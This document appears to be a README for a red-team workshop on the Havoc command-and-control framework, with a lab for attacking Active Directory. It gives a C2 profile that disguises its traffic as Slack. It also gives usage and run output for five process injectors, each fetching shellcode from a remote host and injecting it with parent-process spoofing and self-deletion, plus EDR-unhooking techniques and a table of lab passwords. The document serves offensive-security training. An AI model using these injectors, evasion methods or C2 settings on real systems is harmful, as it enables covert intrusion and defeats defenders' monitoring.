Learn how to compromise an Active Directory Infrastructure by simulating adversarial Tactics, Techniques and Procedures (TTPs) using Havoc Framework.
Agenda
Chapter 1: Intro to C2
- Basic Functionalities of Havoc
- Malleable C2 Profile
- C2 Infrastructure Design
Chapter 2: OPSEC & Evasion
- Built-In Evasion Mechanism of Havoc
- AV Evasion (Custom Injector)
- EDR Bypass
- Post-Exploitation Defense Evasion
Chapter 3: Active Directory
- Local Privilege Escalation
- Kerberos Attacks
- Lateral Movement
- Pivoting
Lab Setup
| Virtual Machine | Username | Password | RAM | Storage | Note | Used In (Chapter) | Download Link |
|---|---|---|---|---|---|---|---|
| Attacker Linux | havoc | havoc | 4 GB | 18 GB | Semi-Mandatory | 1, 2, 3 | OneDrive |
| Attacker Windows | Havoc | havoc | 4 GB | 25 GB | Mandatory | 1, 2 | OneDrive |
| Redirector | redirector | havoc | 1 GB | 5 GB | Optional | 1, 2 | OneDrive |
| Domain Controller | - | - | 2 GB | 15 GB | Mandatory | 3 | OneDrive |
| Workstation 1 | - | - | 1 GB | 15 GB | Mandatory | 3 | OneDrive |
| Workstation 2 | - | - | 1 GB | 15 GB | Mandatory | 3 | OneDrive |
Chapter 1: Intro to C2
C2 Malleable Profile
Teamserver {
Host = "0.0.0.0"
Port = 40056
Build {
Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
Nasm = "/usr/bin/nasm"
}
}
WebHook {
Discord {
# WEBHOOK TOKEN HERE
Url = ""
AvatarUrl = "https://raw.githubusercontent.com/HavocFramework/Havoc/main/Assets/Havoc.png"
User = "Havoc"
}
}
Operators {
user "5pider" {
Password = "password"
}
user "havoc" {
Password = "password"
}
}
Listeners {
Http {
Name = "HTTP"
Hosts = [
"192.168.231.131", # CHANGE TO TEAM SERVER IP
]
HostBind = "192.168.231.131" # CHANGE TO TEAM SERVER IP
HostRotation = "round-robin"
Port = 80
Secure = false
UserAgent = "Slack/415620 CFNetwork/1240.0.4 Darwin/20.5.0"
Headers = [
"Host: msdevchat.slack.com",
"X-Via: haproxy-www-w6k7",
"X-Slack-Req-Id: 6319165c-f976-4d0666532",
"X-Slack-Backend: h",
]
}
Http {
Name = "HTTPS"
Hosts = [
"192.168.231.129", # CHANGE TO REDIRECTOR IP
]
HostBind = "0.0.0.0" # DO NOT CHANGE
HostRotation = "round-robin"
Port = 443
Secure = true
UserAgent = "Slack/415620 CFNetwork/1240.0.4 Darwin/20.5.0"
Headers = [
"Host: msdevchat.slack.com",
"X-Via: haproxy-www-w6k7",
"X-Slack-Req-Id: 6319165c-f976-4d0666532",
"X-Slack-Backend: h",
]
}
Smb {
Name = "SMB"
PipeName = "ntsvcs"
}
}
Demon {
Sleep = 5
Injection {
Spawn64 = "C:\\Windows\\System32\\notepad.exe"
Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
}
}
C2 Infrastructure Design
[Redirector] [Stager]
Chapter 2: OPSEC & Evasion
Runner
Runner is the 1st out of 5 Proof-of-Concept Process Injectors that takes an arbitrary shellcode from a remote URL and perform shellcode injection on a sacrificial process notepad.exe using Win32 API calls. It also supports Parent Process ID (PPID) Spoofing, allowing the sacrificial process to spawn under an arbitrary process using it's PID. If the target -t, --target is not specified, it will perform self-injection instead.
OPSEC Tips: Allocating RWX region is a major outlier for detection as programs will rarely have memory region of RWX. Always allocate RW then flip it to RX.
C:\>Runner.exe -u http://192.168.231.128:9090/demon.bin -t notepad -p 4160 -k
/\
( ;`~v/~~~ ;._
,/'"/^) ' < o\ '".~'\\\--,
,/",/W u '`. ~ >,._.., )'
,/' w ,U^v ;//^)/')/^\;~)'
,/"'/ W` ^v W |; )/'
;'' | v' v`" W } \\
" .'\ v `v/^W,) '\)\.)\/)
`\ ,/,)' ''')/^"-;'
\
".
\ Runner
Process Injector 1: Runner (Win32 API)
-u, --url Required. Remote URL address for raw shellcode.
-t, --target Specify the target/victim process. Default: Self-injection
-p, --parent Spoof victim process under a Parent Process ID (This option is ignored for self-injection)
-k, --kill Enable self-destruct to auto wipe file from disk.
-h, --help Display help screen manual.
|--------------
| Payload : http://192.168.231.128:9090/demon.bin
| Process : C:\Windows\System32\notepad.exe
| PPID Spoofing : 4160
| Self Destruct : True
|--------------
[>] CreateProcessW()
|-> Target Process Created!
|-> PID: 12180
[>] Fetching Payload
[>] VirtualAllocEx()
|-> Base Address: 0x15A89D70000
[>] WriteProcessMemory()
|-> Shellcode Injected!
[>] VirtualProtectEx()
|-> Flipping Memory Protection!
[>] CreateRemoteThread()
|-> Shellcode Executed!
[>] DeleteProcThreadAttributeList()
|-> Deleting Process Artifacts!
[>] CloseHandle()
|-> Closing Process Handle!
[>] CloseHandle()
|-> Closing Thread Handle!
[>] Runner.exe removed from disk!
Clicker
Clicker is a Proof-of-Concept loader for code injection using NT*API calls to defeat Kernel32 API Monitoring. All Win32 APIs are mapped to the respective NT level API as follows:
| Win32 API | NT*API |
|---|---|
| VirtualAllocEx | NtAllocateVirtualMemory |
| WriteProcessMemory | NtWriteVirtualMemory |
| VirtualProtectEx | NtProtectVirtualMemory |
| CreateRemoteThread | NtCreateThreadEx |
C:\>Clicker.exe -u http://192.168.231.128:9090/demon.bin -t notepad -p 4160 -k
.:' `:.
::' `::
:: :. .: ::
`:. `:. . .:' .:'
`::. `:: ! ::' .::'
`::.`::. .' ! `. .::'.::'
`:. `::::'':!:``::::' ::'
:'*:::. .:' ! `:. .:::*`:
:: HHH::. ` ! ' .::HHH ::
::: `H TH::. `!' .::HT H' :::
::.. `THHH:`: :':HHHT' ..::
`:: `T: `. .' :T' ::'
`:. . : : . .:'
`::' `::'
:' .`. . .'. `:
:' ::. .:: `:
:' `::: :::' `:
`. `` '' .'
:`...........':
` :`. .': '
`: `"""' :' Clicker
Process Injector 2: Clicker (Nt*API)
-u, --url Required. Remote URL address for raw shellcode.
-t, --target Specify the target/victim process. Default: Self-injection
-p, --parent Spoof victim process under a Parent Process ID (This option is ignored for self-injection)
-k, --kill Enable self-destruct to auto wipe file from disk.
-h, --help Display help screen manual.
|--------------
| Payload : http://192.168.231.128:9090/demon.bin
| Process : C:\Windows\System32\notepad.exe
| PPID Spoofing : 4160
| Self Destruct : True
|--------------
[>] CreateProcessW()
|-> Target Process Created!
|-> PID: 13092
[>] Fetching Payload
|-> Payload retrieved successfully!
[>] NtAllocateVirtualMemory()
|-> Base Address: 0x23229800000
[>] NtWriteVirtualMemory()
|-> Shellcode Injected!
[>] NtProtectVirtualMemory()
|-> Flipping Memory Protection!
[>] NtCreateThreadEx()
|-> Shellcode Executed!
[>] DeleteProcThreadAttributeList()
|-> Deleting Process Artifacts!
[>] CloseHandle()
|-> Closing Process Handle!
[>] CloseHandle()
|-> Closing Thread Handle!
[>] Clicker.exe removed from disk!
SylantStrike
Home-made Endpoint Detection & Response (EDR) to hook NT*API calls. The hooking logic is not implemented perfectly and has a high chance of false positive. Use only for demonstrating EDR bypass.
PS C:\Users\havoc\Desktop\Tools\SylantStrike\x64\Release> .\SylantStrikeInject.exe --process=Clicker.exe --dll=C:\Users\havoc\Desktop\Tools\SylantStrike\x64\Release\SylantStrike.dll
Waiting for process events
+ Listening for the following processes: clicker.exe
Injecting process Clicker.exe(4312) with DLL C:\Users\havoc\Desktop\Tools\SylantStrike\x64\Release\SylantStrike.dll
Bloater
Bloater is a wrapper used to side-load Clicker for demonstrating Process Mitigation Policy. This technique prevents security vendors from reflectively loading EDR DLLs that are not digitally signed by Microsoft. As a result, kernel32.dll and ntdll.dll of newly spawned processes will not be hooked by EDR vendors unless they have Intermediate Certificates handed out by Microsoft.
C:\>Bloater.exe -f ./Clicker.exe -p 4160 -u http://192.168.231.128:9090/demon.bin -t notepad -s 4160
_
_( (~\
_ _ / ( \> > \
-/~/ / ~\ :; \ _ > /(~\/
|| | | /\ ;\ |l _____ |; ( \/ > >
_\\)\)\)/ ;;; `8o __-~ ~\ d| \ //
///(())(__/~;;\ "88p;. -. _\_;.oP (_._/ /
(((__ __ \\ \ `>,% (\ (\./)8" ;:' i
)))--`.'-- (( ;,8 \ ,;%%%: ./V^^^V' ;. ;.
((\ | /)) .,88 `: ..,,;;;;,-::::::'_::\ ||\ ;[8: ;
)| ~-~ |(|(888; ..``'::::8888oooooo. :\`^^^/,,~--._ |88:: |
|\ -===- /| \8;; ``:. oo.8888888888:`((( o.ooo8888Oo;:;:' |
|_~-___-~_| `-\. ` `o`88888888b` )) 888b88888P""' ;
; ~~~~;~~ "`--_`. b`888888888;(.,"888b888" ..::;-'
; ; ~"-.... b`8888888:::::.`8888. .:;;;''
; ; `:::. `:::OOO:::::::.`OO' ;;;''
: ; `. "``::::::'' .'
; `. \_ /
; ; +: ~~-- `:' -';
`: : .::/ Bloater
; ;;+_ :::. :..;;;
;;;;;;,;;;;;;;;,;
Process Injector 3 (Wrapper): Bloater (Process Mitigation Policy)
-f, --file Required. Absolute path of file to be executed.
-p, --parent Required. Spoof --file under a Parent Process ID.
-u, --url Required. Remote URL address for raw shellcode.
-t, --target Specify the target/victim process. Default: Self-injection
-s, --spoof Spoof --target under a Parent Process ID.
-h, --help Display help screen manual.
|--------------
| File : ./Clicker.exe
| PPID Spoofing : 4160
| Argument 1 : http://192.168.231.128:9090/demon.bin
| Argument 2 : notepad
| Argument 3 : 4160
|--------------
[>] CreateProcessW()
|-> Process Mitigation Policy Enforced!
|-> Spoofed Parent PID Successfully!
|-> Target Process Created!
|-> PID: 19520
RatKing
RatKing is the successor of Clicker as it uses the same boilerplate to perform process injection. At runtime, a fresh copy of ntdll.dll is loaded into the process. The original ntdll.dll that was hooked by EDR is left untouched. All NT*API are exported and called from the clean copy of ntdll.dll instead. This EDR evasion method is especially effective because the integrity of EDR hooks are not tampered with.
C:\>RatKing.exe -u http://192.168.231.128:9090/demon.bin -t notepad -p 4160 -k
.'''''-, ,-`````.
`-.._ | | _..-'
\ `, ,' /
'= ,/ \, =`
'= ( ) =`
.\ / \ /.
/ `,.' `.,' \
\ `. ,' /
\ \ / /
\ .`. __.---. ,`. /
\.' .'`` `. `./
\.' -'''-.. `./
/ / '. \
/ / .-- .-'''` '.
' | ,---. _ \
/``-----._.-. \ / ,-. '-' '. .-._.-----``\
\__ . | : `.' ((O)) ,-. \ : | . __/
`. '-...\_` | '-' ((O)) | '_/...-` .'
.----..) ` \ \ / '-' / / ' (..----.
(o `. / \ \ /\ .' / \ .' o)
```---.. `. /`. '--' '---' .'\ .' ..---```
`-. `. /`. `. .' .'\ .' .-'
`..` / `.' ` - - - ' `.' \ '..'
/ / \ \
/ ,' `. \
\ ,'`. .'`. /
`/ \ / \'
,= ( ) =,
,= '\ /` =,
RatKing / .' `. \
.-''' | | ```-.
`......' `......'
Process Injector 4: RatKing (Manual Mapping ntdll.dll)
-u, --url Required. Remote URL address for raw shellcode.
-t, --target Specify the target/victim process. Default: Self-injection
-p, --parent Spoof victim process under a Parent Process ID (This option is ignored for self-injection)
-k, --kill Enable self-destruct to auto wipe file from disk.
-h, --help Display help screen manual.
|--------------
| Payload : http://192.168.231.128:9090/demon.bin
| Process : C:\Windows\System32\notepad.exe
| PPID Spoofing : 4160
| Self Destruct : True
|--------------
[>] Resolving Addresses of ntdll.dll
|-> Original ntdll.dll: 0x7ff856c10000
|-> New copy of ntdll.dll: 0x1a068730000
[>] CreateProcessW()
|-> Target Process Created!
|-> PID: 9168
[>] Fetching Payload
|-> Payload retrieved successfully!
[>] NtAllocateVirtualMemory()
|-> Base Address: 0x28D20A30000
[>] NtWriteVirtualMemory()
|-> Shellcode Injected!
[>] NtProtectVirtualMemory()
|-> Flipping Memory Protection!
[>] NtCreateThreadEx()
|-> Shellcode Executed!
[>] DeleteProcThreadAttributeList()
|-> Deleting Process Artifacts!
[>] CloseHandle()
|-> Closing Process Handle!
[>] CloseHandle()
|-> Closing Thread Handle!
[>] RatKing.exe removed from disk!
RustKing
RustKing is an adapted version of RatKing on steroids, written in Rust. The intention is to make Reverse Engineering significantly harder.
NOTE: RustKing does not support HTTPS payload download and PPID spoofing. Additionally, target process has to be opened manually prior to running RustKing. --target must be exact match.
C:\>RustKing.exe --url http://192.168.231.128:9090/demon.bin --target notepad.exe
..:::::::::..
..:::aad8888888baa:::..
.::::d:?88888888888?::8b::::.
.:::d8888:?88888888??a888888b:::.
.:::d8888888a8888888aa8888888888b:::.
::::dP::::::::88888888888::::::::Yb::::
::::dP:::::::::Y888888888P:::::::::Yb::::
::::d8:::::::::::Y8888888P:::::::::::8b::::
.::::88::::::::::::Y88888P::::::::::::88::::.
:::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P:::::
:::::::Y88888888888P::|::Y88888888888P:::::::
::::::::::::::::888:::|:::888::::::::::::::::
`:::::::::::::::8888888888888b::::::::::::::'
:::::::::::::::88888888888888::::::::::::::
:::::::::::::d88888888888888:::::::::::::
::::::::::::88::88::88:::88::::::::::::
`::::::::::88::88::88:::88::::::::::'
`::::::::88::88::P::::88::::::::'
`::::::88::88:::::::88::::::'
``:::::::::::::::::::''
OffensiveRust ``:::::::::'' RustKing
[>] Scanning for notepad.exe...
|-> Found process!
|-> PID: 11588
[>] Fetching Payload!
|-> URL: http://192.168.231.128:9090/demon.bin
[>] Resolving Addresses of ntdll.dll
|-> Original ntdll.dll: 0x7FF856C10000
|-> New copy of ntdll.dll: 0x1869DB30000
[>] NtAllocateVirtualMemory()
|-> Base Address: 0x1ED3C1F0000
[>] NtWriteVirtualMemory()
|-> Shellcode Injected!
[>] NtProtectVirtualMemory()
|-> Flipping Memory Protection!
[>] NtCreateThreadEx()
|-> Shellcode Executed!
Chapter 3: Active Directory
Before we start, please ensure the Automatic Sample Submission in Windows Defender AV is disabled and Real-Time Protection is up and running.
Active Directory Network Diagram
Active Directory Network Addresses
-
DC01
- Secure Network
- Static IPv4:
10.10.101.131 - Subnet Mask:
255.255.255.0 - Default Gateway:
10.10.101.1 - Preferred DNS:
127.0.0.1 - Alternate DNS:
8.8.8.8
- Static IPv4:
- Secure Network
-
WORKSTATION-01
-
External Network
- Dynamic IPv4:
192.168.25.xxx(DHCP will assign) - Subnet Mask:
auto-assigned - Default Gateway:
auto-assigned - Preferred DNS:
auto-assigned - Alternate DNS:
auto-assigned
- Dynamic IPv4:
-
Internal Network
- Static IPv4:
10.10.100.128 - Subnet Mask:
255.255.255.0 - Default Gateway:
- Preferred DNS:
10.10.100.129 - Alternate DNS:
8.8.8.8
- Static IPv4:
-
Secure Network
- Static IPv4:
10.10.101.129 - Subnet Mask:
255.255.255.0 - Default Gateway:
10.10.101.1 - Preferred DNS:
10.10.101.131 - Alternate DNS:
8.8.8.8
- Static IPv4:
-
-
WORKSTATION-02
-
Internal Network
- Static IPv4:
10.10.100.129 - Subnet Mask:
255.255.255.0 - Default Gateway:
- Preferred DNS:
10.10.100.128 - Alternate DNS:
8.8.8.8
- Static IPv4:
-
Secure Network
- Static IPv4:
10.10.101.132 - Subnet Mask:
255.255.255.0 - Default Gateway:
10.10.101.1 - Preferred DNS:
10.10.101.131 - Alternate DNS:
8.8.8.8
- Static IPv4:
-
Active Directory Users and Computers
| First Name | Last Name | Username | Password | Group | Involvement |
|---|---|---|---|---|---|
| administrator | [email protected]$$w0rd! |
Domain Admins | * | ||
| Aaron | Adams | a.adams | C0nc0Rd1776! |
Senior Management, Domain Admins | |
| Jonathan | Taylor | j.taylor | Lexington1776! |
IT Admins, Administrators | |
| Jillian | Anthony | j.anthony | H1dD3nV4ll3y! |
Engineering | |
| Tabitha | Carter | t.carter | [email protected] |
Engineering | |
| Megan | Phillips | m.phillips | L4k3LiV3L0ve! |
Engineering, Group Policy Creator Owners | |
| Richard | Smith | r.smith | Baseball123! |
Engineering | |
| Samantha | Chisholm | s.chisholm | FallOutBoy1! |
Sales | * |
| Margaret | Seitz | m.seitz | [email protected] |
Engineering | * |
| Aaron | Tarolli | a.tarolli | Password123! |
Sales | * |
| Zane | Dickens | z.dickens | M0t0rH3Ad65^$# |
Sales |
| Machines | Local Admin | Domain Users |
|---|---|---|
| WORKSTATION-01.havoc.local | s.chisholm | m.seitz, a.tarolli |
| WORKSTATION-02.havoc.local | m.seitz | |
| DC01.havoc.local | administrator |
Active Directory Flag Details
- Flag Format:
HAVOC{MD5} - Flag Amount: 3
- Flag Location:
\\COMPUTER-NAME\C$\Users\localadmin-or-administrator\Desktop\flag.txt